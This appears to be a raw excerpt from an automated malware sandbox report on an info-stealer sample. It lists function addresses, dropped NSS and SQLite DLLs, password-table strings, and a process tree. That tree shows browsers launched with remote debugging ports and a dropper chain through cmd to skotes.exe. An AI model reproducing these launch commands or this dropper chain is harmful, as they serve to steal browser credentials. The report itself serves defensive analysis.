Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C97FEF0	1_2_6C97FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9D76E3	1_2_6C9D76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9A7E10	1_2_6C9A7E10
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9B5600	1_2_6C9B5600
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9C9E30	1_2_6C9C9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C989E50	1_2_6C989E50
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9A3E50	1_2_6C9A3E50
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9B2E4E	1_2_6C9B2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C984640	1_2_6C984640
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C96C670	1_2_6C96C670
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9D6E63	1_2_6C9D6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9B77A0	1_2_6C9B77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C996FF0	1_2_6C996FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C96DFE0	1_2_6C96DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9A7710	1_2_6C9A7710
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C979F00	1_2_6C979F00
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9960A0	1_2_6C9960A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9D50C7	1_2_6C9D50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C98C0E0	1_2_6C98C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9A58E0	1_2_6C9A58E0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C977810	1_2_6C977810
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9AB820	1_2_6C9AB820
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9B4820	1_2_6C9B4820
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C988850	1_2_6C988850
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C98D850	1_2_6C98D850
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9AF070	1_2_6C9AF070
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9A5190	1_2_6C9A5190
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9C2990	1_2_6C9C2990
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C99D9B0	1_2_6C99D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C96C9A0	1_2_6C96C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C98A940	1_2_6C98A940
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9BB970	1_2_6C9BB970
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9DB170	1_2_6C9DB170
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C97D960	1_2_6C97D960
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9DBA90	1_2_6C9DBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C97CAB0	1_2_6C97CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9D2AB0	1_2_6C9D2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9622A0	1_2_6C9622A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C994AA0	1_2_6C994AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9A8AC0	1_2_6C9A8AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C981AF0	1_2_6C981AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9AE2F0	1_2_6C9AE2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9A9A60	1_2_6C9A9A60
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C96F380	1_2_6C96F380
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9D53C8	1_2_6C9D53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9AD320	1_2_6C9AD320
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C965340	1_2_6C965340
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C97C370	1_2_6C97C370
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA0ECC0	1_2_6CA0ECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA6ECD0	1_2_6CA6ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAEAC30	1_2_6CAEAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAD6C00	1_2_6CAD6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA1AC60	1_2_6CA1AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA14DB0	1_2_6CA14DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAA6D90	1_2_6CAA6D90
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB9CDC0	1_2_6CB9CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB98D20	1_2_6CB98D20
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CADED70	1_2_6CADED70
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB3AD50	1_2_6CB3AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA96E90	1_2_6CA96E90
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA1AEC0	1_2_6CA1AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAB0EC0	1_2_6CAB0EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAF0E20	1_2_6CAF0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAAEE70	1_2_6CAAEE70
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB58FB0	1_2_6CB58FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA1EFB0	1_2_6CA1EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA10FE0	1_2_6CA10FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAEEFF0	1_2_6CAEEFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB50F20	1_2_6CB50F20
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA16F10	1_2_6CA16F10
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAD2F70	1_2_6CAD2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA7EF40	1_2_6CA7EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB168E0	1_2_6CB168E0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA60820	1_2_6CA60820
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA9A820	1_2_6CA9A820
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAE4840	1_2_6CAE4840
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAA09A0	1_2_6CAA09A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CACA9A0	1_2_6CACA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAD09B0	1_2_6CAD09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB2C9E0	1_2_6CB2C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA449F0	1_2_6CA449F0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA66900	1_2_6CA66900
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA48960	1_2_6CA48960
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA8EA80	1_2_6CA8EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAC8A30	1_2_6CAC8A30
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CABEA00	1_2_6CABEA00
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA8CA70	1_2_6CA8CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAB0BA0	1_2_6CAB0BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB16BE0	1_2_6CB16BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB3A480	1_2_6CB3A480
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA564D0	1_2_6CA564D0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAAA4D0	1_2_6CAAA4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA74420	1_2_6CA74420
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA9A430	1_2_6CA9A430
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA28460	1_2_6CA28460
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA045B0	1_2_6CA045B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CADA5E0	1_2_6CADA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA9E5F0	1_2_6CA9E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA72560	1_2_6CA72560
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAB0570	1_2_6CAB0570
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB58550	1_2_6CB58550
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA68540	1_2_6CA68540
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB14540	1_2_6CB14540
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA6E6E0	1_2_6CA6E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAAE6E0	1_2_6CAAE6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA346D0	1_2_6CA346D0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA6C650	1_2_6CA6C650
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA3A7D0	1_2_6CA3A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA90700	1_2_6CA90700
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA200B0	1_2_6CA200B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAEC0B0	1_2_6CAEC0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA08090	1_2_6CA08090
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CADC000	1_2_6CADC000
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAD8010	1_2_6CAD8010
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA5E070	1_2_6CA5E070
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA101E0	1_2_6CA101E0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA86130	1_2_6CA86130
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAF4130	1_2_6CAF4130
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA78140	1_2_6CA78140
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAE22A0	1_2_6CAE22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CADE2B0	1_2_6CADE2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB962C0	1_2_6CB962C0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAE8220	1_2_6CAE8220
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CADA210	1_2_6CADA210
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA98260	1_2_6CA98260
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAA8250	1_2_6CAA8250
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA423A0	1_2_6CA423A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA6E3B0	1_2_6CA6E3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA643E0	1_2_6CA643E0
Source: C:\Users\user\Documents\JJECFIECBG.exe	Code function: 19_2_00668860	19_2_00668860
Source: C:\Users\user\Documents\JJECFIECBG.exe	Code function: 19_2_00667049	19_2_00667049
Source: C:\Users\user\Documents\JJECFIECBG.exe	Code function: 19_2_006678BB	19_2_006678BB
Source: C:\Users\user\Documents\JJECFIECBG.exe	Code function: 19_2_006631A8	19_2_006631A8
Source: C:\Users\user\Documents\JJECFIECBG.exe	Code function: 19_2_00624B30	19_2_00624B30
Source: C:\Users\user\Documents\JJECFIECBG.exe	Code function: 19_2_00662D10	19_2_00662D10
Source: C:\Users\user\Documents\JJECFIECBG.exe	Code function: 19_2_00624DE0	19_2_00624DE0
Source: C:\Users\user\Documents\JJECFIECBG.exe	Code function: 19_2_00657F36	19_2_00657F36
Source: C:\Users\user\Documents\JJECFIECBG.exe	Code function: 19_2_0066779B	19_2_0066779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00748860	20_2_00748860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00747049	20_2_00747049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_007478BB	20_2_007478BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_007431A8	20_2_007431A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00704B30	20_2_00704B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00742D10	20_2_00742D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00704DE0	20_2_00704DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00737F36	20_2_00737F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_0074779B	20_2_0074779B

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 007180C0 appears 130 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C99CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB9DAE0 appears 48 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C9A94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB909D0 appears 214 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CA33620 appears 55 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CA39B10 appears 47 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB9D930 appears 39 times
Source: C:\Users\user\Documents\JJECFIECBG.exe	Code function: String function: 006380C0 appears 130 times

Source: file.exe, 00000001.00000002.2772680750.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000001.00000002.2767616784.000000000C06C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
Source: file.exe, 00000001.00000002.2767616784.000000000C06C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: jxsibylc ZLIB complexity 0.9950356585161487
Source: random[1].exe.22.dr	Static PE information: Section: ZLIB complexity 0.9979634675266904
Source: random[1].exe.22.dr	Static PE information: Section: wdzyrihu ZLIB complexity 0.9948314987377488
Source: 60949160aa.exe.22.dr	Static PE information: Section: ZLIB complexity 0.9979634675266904
Source: 60949160aa.exe.22.dr	Static PE information: Section: wdzyrihu ZLIB complexity 0.9948314987377488

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@39/53@7/10

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_6C9C7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

1_2_6C9C7030

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\10EYQSIJ.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1512:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Documents\JJECFIECBG.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000001.00000002.2771836721.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2764537815.0000000006039000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000001.00000002.2771836721.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2764537815.0000000006039000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000001.00000002.2771836721.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2764537815.0000000006039000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000001.00000002.2771836721.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2764537815.0000000006039000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000001.00000002.2771836721.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2764537815.0000000006039000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000001.00000002.2771836721.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2764537815.0000000006039000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000001.00000002.2771836721.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2764537815.0000000006039000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000001.00000003.2518886248.0000000005ECD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2383762711.0000000005ED9000.00000004.00000020.00020000.00000000.sdmp, BAEBFIIECBGCBGDHCAFC.1.dr, KKJDGDHIDBGIECBGHJDB.1.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000001.00000002.2771836721.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2764537815.0000000006039000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000001.00000002.2771836721.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2764537815.0000000006039000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

Virustotal: Detection: 48%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: JJECFIECBG.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=2200,i,1340459741847875032,4804373366831485818,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2136,i,6607113195327049386,14986448368606126655,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2092,i,10298190665720480491,4854320900994786694,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JJECFIECBG.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\JJECFIECBG.exe "C:\Users\user\Documents\JJECFIECBG.exe"
Source: C:\Users\user\Documents\JJECFIECBG.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe "C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JJECFIECBG.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=2200,i,1340459741847875032,4804373366831485818,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
